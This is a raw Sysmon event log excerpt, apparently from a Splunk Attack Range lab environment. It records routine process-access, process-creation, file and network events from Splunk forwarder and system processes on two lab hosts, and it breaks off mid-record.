16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246420Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246419Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246418Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246417Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246416Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-5296-6063-C922-00000000AF01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246415Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5296-6063-C922-00000000AF01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246414Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.899{CB4067E1-5296-6063-C922-00000000AF01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246413Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.867{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=405B5ABBBB0C9B8C2B2B2D39B51B0B69,SHA256=1C69C607562EDA4E7FF41EC22C957C39833286875928E15CB5A36D707056ABDA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246412Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.414{CB4067E1-5296-6063-C822-00000000AF01}32403408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x8000000000000000246411Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.656{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64815-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000246410Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5296-6063-C822-00000000AF01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246409Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246408Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246407Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246406Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246405Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246404Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246403Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246402Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246401Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246400Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-5296-6063-C822-00000000AF01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246399Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.303{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5296-6063-C822-00000000AF01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246398Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.304{CB4067E1-5296-6063-C822-00000000AF01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246397Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.131{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C225BDAAD586F9CABA1BD6816E72B65,SHA256=29346B4B80A53B9A881168425B4F943421B707E7AC7249E807AB1EE7B67B2C65,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061573Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:20.818{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54847-false10.0.1.12-8000- 10341000x80000000000000001061572Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.817{7F8C56E7-5297-6063-3601-00000000AF01}52844960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061571Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.692{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5297-6063-3601-00000000AF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061570Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.692{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061569Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 